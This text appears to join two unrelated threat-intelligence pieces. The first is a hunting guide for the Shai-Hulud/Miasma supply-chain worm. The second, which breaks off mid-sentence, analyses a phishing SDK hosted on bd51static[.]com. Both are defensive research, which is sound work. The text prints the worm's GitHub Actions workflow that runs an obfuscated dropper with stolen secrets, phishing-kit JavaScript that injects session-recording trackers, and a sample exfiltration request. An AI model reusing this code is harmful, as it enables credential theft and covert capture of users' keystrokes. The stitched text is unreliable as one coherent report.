1. What you are hunting

Shai-Hulud (a.k.a. Miasma / “The Second Coming”), actor TeamPCP (~UNC6780), is a self-propagating supply-chain worm. It executes on a developer machine, harvests every credential it can reach, and re-uses those credentials to (1) publish poisoned package versions, (2) inject an obfuscated dropper into source repositories, and (3) stage stolen secrets in throw-away “dead-drop” repos. It exists in two strains that are actively evolving — treat it as a family, not a fixed IOC set:

• “classic” Shai-Hulud (worker) — a throw-away repo running an obfuscated script via a GitHub Actions workflow. Loud: persona author “THE ASSET”, real timestamps, no identity forgery.

• Miasma (injection) — an oversized .github/setup.js committed into an existing repo using a stolen maintainer token. Stealthy: the commit impersonates a real maintainer and is back-dated years to hide in history.

The single most useful fact for a hunter: the commit author / e-mail / date are attacker-controlled (the “author-pusher gap”). NEVER sequence or scope by commit date. Anchor on the server-side push time and on what cannot be forged a GPG signature, a file’s size, a workflow’s contents.

2. The adversary’s actions, in detail

2.1 The loop

Infection closes a loop on every newly-compromised machine: EXECUTE (auto-run on install or editor/CI trigger) → HARVEST (env vars, ~/.npmrc, cloud metadata 169.254.169.254, git/npm tokens) → PUBLISH / INJECT / STAGE. Auto-run is wired through npm pre/postinstall hooks, package.json scripts, agent/editor triggers (.claude/.gemini SessionStart, .cursor rules, .vscode folderOpen) and GitHub Actions workflows.

2.2 Two dropper strains

The size gap matters operationally: a detector tuned to “~5 MB” misses the ~685 KB worker entirely.

2.3 The worker delivery (classic)

A throw-away repo is created and an obfuscated script (any name/extension JS or Python) is committed to root or a dotdir, plus a workflow that runs it (static read never run):

# .github/workflows/run.yml

on: workflow_dispatch

jobs: { run: { runs-on: ubuntu-latest, permissions: { issues: write },

  steps:

   - uses: actions/checkout@v6

   - uses: oven-sh/setup-bun@v2

   - env: { GITHUB_TOKEN2: ${{ secrets.PATS }} }

     run: bun run index.js } }

Signature: oven-sh/setup-bun + bun run <script> + secrets.PATS / GITHUB_TOKEN2. The script is the dropper, regardless of name.

2.4 The injection delivery + commit-identity forgery (Miasma)

With a stolen maintainer token the worm commits the ~5 MB .github/setup.js into an existing repo and forges the commit to hide it:

• Author spoofing: author/e-mail set to a real maintainer of that repo (sometimes a different person than the pusher).

• Back-dating rule: the malicious commit clones the current HEAD commit’s exact timestamp (0-day gap from its parent). When HEAD is a PR-merge it replays the real “Merge pull request #N” text and the PR’s exact merge time; otherwise a plausible dev message + [skip ci]. Stale repos → inherited dates are years old.

• Unsigned: the one un-forgeable field: forged commits are verified=false while the real maintainer signs.

Measured across 1,311 injection commits (anchored on real push time): 93% unsigned, 58% author-spoofed, 75% back-dated (median ~2.8 yr, max ~12.6 yr), 54% [skip ci], 0% future-dated. The malicious commit clones an existing old commit’s timestamp, so the forged date is always in the past.

2.5 Dead-drop exfiltration

Harvested secrets are written to disposable repos on the victim’s own account (markers: “Sha1-Hulud: The Second Coming”, “A Mini Shai-Hulud has Appeared”). Exfil-only in the historical firehose the dead-drop owners made zero cross-account actions. ~hundreds of drops per victim (≈48× loop inflation); dedupe by owner for a real victim count.

3. Strain evolution & campaign timeline

The forgery is a Miasma adaptation, not present in the classic worker. The worker uses fresh throw-away repos with no history to blend into, so it forges nothing. Miasma injects into existing repos with real maintainers and history, so it added impersonation + multi-year back-dating to disappear into that history.

Trajectory: loud, disposable workers → stealthy, history-blending injection. The tradecraft is evolving; expect later waves to carry more sophisticated evasion. Hunt by behaviour, not by today’s IOCs.

Figure 1 · Strain & infection timeline the two waves of dead-drops, the Miasma injection window, and the two documented evolution points (identity forgery; marker mutation).

4. Hunting playbook

4.1 Two rules before anything else

• Never execute a sample. Everything below is static: tree metadata (paths + sizes), commit metadata, workflow YAML. The ingested dropper blob is never fetched or run, so the hunt cannot infect the hunter.

• Anchor on the un-forgeable. Server-side push time (Events/GH Archive), GPG verification, file size, workflow contents. Ignore author.date for sequencing.

4.2 Source matrix - pick the right reach

4.3 Step-by-step hunt

1. Seed. Pull OSV MAL-2026-* (poisoned packages) and the community dead-drop marker lists.

2. Dedupe dead-drops by owner. Hundreds of drops collapse to a handful of victim accounts that is your compromised-user roster.

3. Enumerate each victim’s repos and size-scan them. This finds BOTH strains and recovers repos the name/marker rosters missed.

4. Confirm the strain. Miasma = oversized .github/setup.js (≥3 MB). Worker = root/dotdir script ≥200 KB + a workflow with the secrets.PATS / GITHUB_TOKEN2 signature.

5. For injections, audit the forgery. Pull the repo’s pushes from GH Archive at the real push hours; for each commit compute push_time − author.date, check verified and [skip ci].

6. Pivot to blast radius. Map each push-actor to their employer/orgs (profile + memberships); org-owned repos they can write to are the next-hop risk.

4.4 The detection heuristics (copy these)

DROPPER (both strains, name+size-agnostic) — from the repo tree:

  flag a blob where  ext in {.js .cjs .mjs .ts .py .sh}

                     AND size >= 200_000            # worker ~685KB ; Miasma ~5MB

                     AND ( path has no ‘/’           # repo ROOT

                           OR first_segment.startswith(’.’) )   # any DOTDIR

                     AND not path matches dist/|public/|libs/|node_modules/

                           |.yarn/|.pnp|.next/|.nuxt/|.output/   # legit big files

WORKER workflow — from .github/workflows/*.yml (static):

  contains  ‘secrets.PATS’  OR  ‘GITHUB_TOKEN2’      # credential exfil (unambiguous)

  often with  oven-sh/setup-bun  +  ‘bun run <script>’

FORGERY (Miasma) — per commit, via Git Data API + GH Archive push time:

  backdated   = (push_time - author.date) > 7 days   # often years in the past

  spoofed     = commit author.login != real pusher

  unsigned    = verification.verified == false  AND maintainer normally signs

  ci_evasion  = ‘[skip ci]’ in message

Location does double duty: legit oversized files (Monaco, Vite/Angular bundles, Storybook, Nuxt .output) live under dist/ / public/ / libs/ never root or a dotdir so the root-or-dotdir rule catches both droppers and excludes those false positives.

4.5 Pitfalls that produce wrong verdicts

• Name-scoping. The dropper is not always setup.js match on size+location, JS and Python.

• Date-windowed commit search. --since filters skip back-dated commits by construction; fetch by SHA.

• “Recent commits” views. Back-dating buries the dropper below the fold; use the tree, not git log.

• Remediated ≠ never-infected. A reverted HEAD hides the injection; check surviving commit objects by SHA.

• The 300-event API cap. Active maintainers are undercounted; use GH Archive for completeness.

5. Observed scope & the companion data

• Red Hat messaging maintainers compromised (accounts REDACTED) Miasma injections into rh-messaging/* and jboss-container-images/* (HEADs remediated).

• SAP:" a compromised build-bot account (REDACTED) is a public SAP org member; dead-drop victims skew to SAP CAP/UI5/Fiori (poisoned @cap-js/*).

• Worker fleets under several compromised accounts (REDACTED), using testing-* / experiments* throwaway repos; crypto/Web3 repos carry live droppers.

• GitHub-wide discovery (marker + worker-credential + Dune-naming search) added ~164 compromised accounts and >1,200 repos beyond the original roster a FLOOR, since code search under-indexes the small/ephemeral repos this campaign favours.

Companion data bundle (accompanies this guide, in export/): repos.csv (strain, dropper_path/size, mitigated y/n+date, org) · infected_commits.csv (sha, title, real push vs forged author date, backdate gap, verified, skip_ci) · forged_identities.csv · users.csv (→ name/company/org) · organizations.csv · packages.csv · strain_infection_timeline.svg · neo4j/ (graph import: nodes+rels, import.sh, load.cypher). Real timestamp = server-side push (un-forgeable); forged = commit author.date. All analysis static; no sample executed. Counts are a floor.

Building on what we uncovered in our Clack & Dagger report, our research now connects this trojan’s infrastructure with the same ecosystem of phishing SDKs and cloaked domains we analyzed. The malware goes far beyond traditional credential theft — it logs keystrokes, tracks mouse activity, monitors the clipboard, and even captures audio through the infected device. Combined with its targeting of VPN software and obfuscated exfiltration channels, it demonstrates a systematic attempt to maintain persistent access and siphon highly sensitive data at scale.

bd51static[.]com is a domain used to hide calls to 51[.]la scripts from Web Scanners that fetch only HTML page with one GET request. There is nothing else there — just JavaScript files wrapping the calls to 51[.]la scripts.

This is used by bad actors who clone real websites and then sending phishing links. The similarity between such phishing sites indicates they are built with the same phishing SDK, where bd51static[.]com is essential part of it. Huge number of cloned websites allows wide choice for each specific attack, carefully selecting links that match victims’ interests, increasing success rate.

The 51[.]la JavaScript framework is a powerful and feature-rich analytics suite for deep insights into user behavior. However, its comprehensive data collection, particularly the session recording capabilities, demands extreme caution regarding user privacy. Website operators using this framework have a significant responsibility to:

• Ensure Full Transparency: Clearly inform users about the extent of data collection.

• Obtain Explicit Consent: Secure appropriate consent from users, especially for sensitive data collection and session recording.

• Implement Robust Data Masking: Rigorously mask or redact sensitive information in forms and other interactive elements to prevent its unintended capture during session recording.

• Adhere to Data Protection Regulations: Comply with all relevant local and international privacy laws.

Without these stringent measures, deploying the 51[.]la framework, especially its session recording component, could lead to significant privacy violations.

None of the websites detected in this Investigation showing any “consent” message.

Every mouse move, click, scroll, and keypress is recorded. This creates a highly detailed profile of user behavior that can be replayed visually, which is a significant privacy intrusion if not transparently handled and consented to.

The script explicitly captures keyboard inputs and changes to elements. Without specific masking or redaction rules implemented on the website, this means sensitive information (e.g., passwords, credit card numbers, personal details) typed into forms can be recorded and transmitted. The code does not show explicit mechanisms for sensitive data masking within this snippet.

All collected data is sent to 51[.]la servers. The security and privacy responsibilities of 51[.]la regarding the storage, access, and use of this highly sensitive session replay data are paramount.

On VirusTotal.com this domain (bd51static[.]com) has notable amount of “RED” related files:

Mostly all are JavaScript and HTML in “RED”, some PDF files are “GREEN”, and 2 “WIN32 EXE”:

https://www.virustotal.com/gui/file/6ac352249c9a544218859240ec90ce98253bea1fc8d9d70ed0b07824b5f79782/detection

https://www.virustotal.com/gui/file/d9f87b568cb76a92005ced8a600752b32a289e246fe07233471934c4e6e329cd/relations

This is not an ordinary situation.

While first EXE refers to domain 6d6d[.]net that no longer accessible, the second refers to canadasrv[.]info which shows a “Gambling”- cloak hiding clone of CanaDream:

and “proud user” of 11sp[.]js script from bd51static[.]com.

It also provides us an example of what request with collected data may look like:

<http://collect-v6>[.]51[.]la/v6/collect?dt=2&data=N4IgbgrAwg9gtgSQCYgFwAIB2BXANrgGnRAEsUMQBpAI2wAYBDAUwDYAJAdzYYGs2AVAFo8QREACcALmnQBGAOwAWAEzKAnIrV0AzBsVjJ0ioGb7QEy2gDz1AC-ERAGdqBO00ANzoC51QC9ugWpMA1IAB9QGqagZb9AHPNAZXlAS31lOmVFAB9ZFgAOM1tARX9fQDDlQCflbx9AU-NAI+jA9CgGTAYAEXEmBjhRYh4OGRAzK1tHVzcCX0DQ8MiCWITTZLT0jpz8gIJxMELihiQGIgAdTABjKoAHGZL5pdWNpnF0CsxJBkJluBhJGHEAC3gmI6YTs4JlqaeX3ABnIgBiWToABKADVPqdcOgVvB1sUAJ7oEiYKGzHboS7fSRPaFwODPJBMJBHabHCFQmHwxHItbbBbEMRIb4NABiSKJkluj2oTExgAQGQBEsZZABVygCwEwCIDP0zKErIAUuXpxG+ZBZdBYdE0AEE1ABaFiydXqrWKdWlZlatSlOIQLWyOjqgCi8QAQspZIo6HEaiAVtgGrdDOtUAB6QM0uYMb5TAB0SIAZjBAwB+MAAXkUAFJlHaIgAyODfADmyaRmM96x9FE94lwDVddDoACobRA6J7cMV8w1nlqAKoAZU9KyMxGwmB4mBg9TE3zA5DkYhWTBksnns+0yinhhkdAZ4i3YmwYG+KyX+6VFHVcXkWigihYWuZaivhuZjrtZrUcVNa+0ETiimZ6oQKULCetgMZDgoKjqJoOgfnQAC+QA

The bd51static[.]com domain was created at 2021–10–07T03:12:22Z, via Namecheap Inc. and was hosted on following IP addresses over the time (data collected using Security Trails):

The JavaScript files hosted there that have almost identical content:

if (location.hostname === ‘gushibisai[.]cn’) {
// Skip execution
} else {
document.write(”<script>!function(p){\\”use strict\\”;!function(t){var s=window,e=document,i=p,c=\\”\\”.concat(\\”https:\\”===e.location.protocol?\\”https://\\”:\\”http://\\”,\\”sdk[.]51[.]la/js-sdk-pro.min.js\\”),n=e.createElement(\\”script\\”),r=e.getElementsByTagName(\\”script\\”)[0];n.type=\\”text/javascript\\”,n.setAttribute(\\”charset\\”,\\”UTF-8\\”),n.async=!0,n.src=c,n.id=\\”LA_COLLECT\\”,i.d=n;var o=function(){s.LA.ids.push(i)};[s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()](<http://s.la/?s.LA.ids&&o():(s.LA=p,s.LA.ids=%5B%5D,o()>)),r.parentNode.insertBefore(n,r)}()}({id:\\”Kbu0ae6HwHakHTZk\\”,ck:\\”Kbu0ae6HwHakHTZk\\”});</script>”)
document.write(”<script>!function(p){\\”use strict\\”;!function(t){var s=window,e=document,i=p,c=\\”\\”.concat(\\”https:\\”===e.location.protocol?\\”https://\\”:\\”http://\\”,\\”sdk[.]51[.]la/js-sdk-pro.min.js\\”),n=e.createElement(\\”script\\”),r=e.getElementsByTagName(\\”script\\”)[0];n.type=\\”text/javascript\\”,n.setAttribute(\\”charset\\”,\\”UTF-8\\”),n.async=!0,n.src=c,n.id=\\”LA_COLLECT\\”,i.d=n;var o=function(){s.LA.ids.push(i)};[s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()](<http://s.la/?s.LA.ids&&o():(s.LA=p,s.LA.ids=%5B%5D,o()>)),r.parentNode.insertBefore(n,r)}()}({id:\\”Kbu24kLHSAUfBcx4\\”,ck:\\”Kbu24kLHSAUfBcx4\\”});</script>”)
var _hmt = _hmt || [];
(function() {
var hm = document.createElement(”script”);
hm.src = “<https://hm>[.]baidu[.]com/hm.js?9449080f1fd9d69519fb3ef29e931160”;
var s = document.getElementsByTagName(”script”)[0];
s.parentNode.insertBefore(hm, s);
})();

There are some variants:

• with/without Baidu _hmt function

• with/without “skip execution” condition and probably different domain in this condition

• different id and ck values

All such files URL have similar pattern:

<http://bd51static>[.]com/<number from 0 to 24><2 low case letters>.js

We are not sure why “skip execution” exists and what is so special about this domain: gushibisai[.]cn

Here some of the scripts we detected (”now” - means this month, “first_time_seen” is approximation based on the earliest sighting we were able to find):

As You can see we are missing scripts that start with 1, 3 and have additional 000-starting script (a typo?).

We can also see in the data that some scripts changed their content completely over the time.

bd51static[.]com/8ad.js content:

November 3rd 2021, 4:23:11 pm UTC:

document.write (’<script> var _hmt = _hmt || []; (function() { var hm = document.createElement(”script”); hm.src = “<https://hm>[.]baidu[.]com/hm.js?819fac51004b03b92f4ce54199d2471b”; var s = document.getElementsByTagName(”script”)[0]; s.parentNode.insertBefore(hm, s); })(); </script>’);
document.write (’<script> var _hmt = _hmt || []; (function() { var hm = document.createElement(”script”); hm.src = “<https://hm>[.]baidu[.]com/hm.js?fd37a1a07d7bfd08543f4e483a7f0d2b”; var s = document.getElementsByTagName(”script”)[0]; s.parentNode.insertBefore(hm, s); })(); </script>’);

July 23rd 2022, 6:54:30 am UTC:

document.write(”<script>!function(p){\\”use strict\\”;!function(t){var s=window,e=document,i=p,c=\\”\\”.concat(\\”https:\\”===e.location.protocol?\\”https://\\”:\\”http://\\”,\\”sdk[.]51[.]la/js-sdk-pro.min.js\\”),n=e.createElement(\\”script\\”),r=e.getElementsByTagName(\\”script\\”)[0];n.type=\\”text/javascript\\”,n.setAttribute(\\”charset\\”,\\”UTF-8\\”),n.async=!0,n.src=c,n.id=\\”LA_COLLECT\\”,i.d=n;var o=function(){s.LA.ids.push(i)};s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()),r.parentNode.insertBefore(n,r)}()}({id:\\”JWt5y7kp2GoqVv83\\”,ck:\\”JWt5y7kp2GoqVv83\\”});</script>”)

document.write(”<script>!function(p){\\”use strict\\”;!function(t){var s=window,e=document,i=p,c=\\”\\”.concat(\\”https:\\”===e.location.protocol?\\”https://\\”:\\”http://\\”,\\”sdk[.]51[.]la/js-sdk-pro.min.js\\”),n=e.createElement(\\”script\\”),r=e.getElementsByTagName(\\”script\\”)[0];n.type=\\”text/javascript\\”,n.setAttribute(\\”charset\\”,\\”UTF-8\\”),n.async=!0,n.src=c,n.id=\\”LA_COLLECT\\”,i.d=n;var o=function(){s.LA.ids.push(i)};s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()),r.parentNode.insertBefore(n,r)}()}({id:\\”JWu0x8e9wdmkDTBz\\”,ck:\\”JWu0x8e9wdmkDTBz\\”});</script>”)

Please not that 2021 sighting also included call js[.]users[.]51[.]la subdomain from HTML — related to malicious activity.

We were able to identify more than 7 generations for some scripts.

LA_COLLECT block initialized twice and this is not an error. This fits the facts. Each block can be used by different content: one is for “Gambling”-cloak and another one for “Cloned”-cloak.

All scripts that still active (“now” in “last_time_seen” column) initialized first pair with:

id: Kbu0ae6HwHakHTZk
ck: Kbu0ae6HwHakHTZk

We assume that this pair is for “Gambling”-cloak content which is similar for all hosts using bd51static[.]com now. This can be also treated as fingerprint for this Phishing SDK version.

Second pair is a campaign or Threat Actor related. Giving us 15 currently active users or campaigns of this SDK version.

What are “id” and “ck”?

• id (within LA.init({})): This parameter is your site ID or tracking ID provided by 51[.]la when you register your website with their service. It uniquely identifies your website to 51[.]la, allowing them to collect and display analytics data specifically for your site. Think of it as your unique account number for that particular website in their system.

• ck (within LA.init({})): This parameter often refers to a checksum or a secret key that is also provided by 51[.]la. It acts as a form of authentication or verification, ensuring that the tracking requests originate from your registered site and are legitimate. In many cases, you’ll see the id and ck values being the same, suggesting that the ck might be a redundancy or a simple copy of the id for certain configurations, or it might be used for internal validation by 51[.]la’s system.

If our assumption is correct, it means, Threat Actors that using this SDK are sharing the collected data with SDK owners, and this is also the reason to hide the unique account ID from one-request scanners.

Baidu HM ID “9449080f1fd9d69519fb3ef29e931160” — is the site ID or tracking ID for the specific website property. Given that this is present almost on all bd51static[.]com scripts — this is SDK Owners tracking ID. Meaning, SDK Owners have account at Baidu Analytics with this ID.

There is also very interesting claims about Baidu part of the code — here.

There are Public Researches that too similar, for example:

• “Phishing and Cryptocurrencies : Uncovering the infrastructure of a network of scams” by Alb310 (20 August 2024).

• “Mac Users Targeted by Trojanized iTerm2 App” by Steven Du, Luis Magisa (September 30, 2021)

• “Master of Puppets: Uncovering the DoppelGänger pro-Russian influence campaign” by Sekoia TDR, Coline Chavane, Amaury G. and Kilian Seznec (May 21 2024)

By just taking the LA.init values from the first one, where copied websites were used for phishing and included 51[.]la analytics, we were able to find one of the currently existing hosts described in this Research, and given the similarity between hosts to find more of them using Censys.io:

Simple script extracted all LA.init unique values from these hosts:

LA.init({id:”3HGOkyQbi3b9rfq5”,ck:”3HGOkyQbi3b9rfq5”}) - 1 host on TERAEXCH (Singapore)
LA.init({id:”3IzaGTMUSK1viRpW”,ck:”3IzaGTMUSK1viRpW”}) - 90 hosts on  ANTBOX1-AS-AP Antbox Networks Limited (Selangor, Malaysia)
LA.init({id:”3LJDNLffG8eqfbSb”,ck:”3LJDNLffG8eqfbSb”}) - 7 hosts on TERAEXCH (Singapore)
LA.init({id:”3LJDKRjdlIcWwUe3”,ck:”3LJDKRjdlIcWwUe3”}) - 12 hosts on TERAEXCH (Singapore)
LA.init({id:”3LmcTcV6dXnzzQ36”,ck:”3LmcTcV6dXnzzQ36”}) - 4 hosts on  ANTBOX1-AS-AP Antbox Networks Limited (Islands, Hong Kong), 4 hosts on VMISS (Hong Kong)
LA.init({id:”3MCEqmfZqNWenj44”,ck:”3MCEqmfZqNWenj44”}) - 10 hosts on TERAEXCH (Singapore)

So, we can assume that there 6 clear blocks of these hosts (different campaigns or Threat Actors).

NEBULA hosted hosts do not use LA.init explicitly.

On ZoomEye.ai historical view:

This is very indicate reason why more advanced Phishing SDK MUST hide it’s 51[.]la configuration to avoid being easily fingerprinted.

The second story shows copy very similar to what we observed:

From the third Research, we can see that la-sante[.]info domain listed there:

Now resolves to 34[.]92[.]126[.]136 and looks like this (yes, it is part of the Phishing Empire now):

Showing aotearoaleaks[.]org domain SSL certificate with content of ako.ac.nz “Ako Aotearoa”.

Last, but the best is automatic analysis of communication to one of the domains in the Phishing Empire, done by AlienVault.

It tells the “under-the-hood” story of communication to jienan[.]net domain.

First references to it we can find, talks about fake Amazon Japan phishing page — here on November 22, 2021 (still not part of Phishing empire). VirusTotal confirms:

This is how it looks now:

Showing clone of www.pcworld.com magazine.

Let’s us show just some of capabilities of this SDK:

What is interesting even more is that in “encrypted_ioc” chapter it lists encrypted communication to following addresses:

super-ec[.]cn
wghai[.]com
qsyou[.]com

Quick search using all 3 addresses, led us to this report by SonicWall: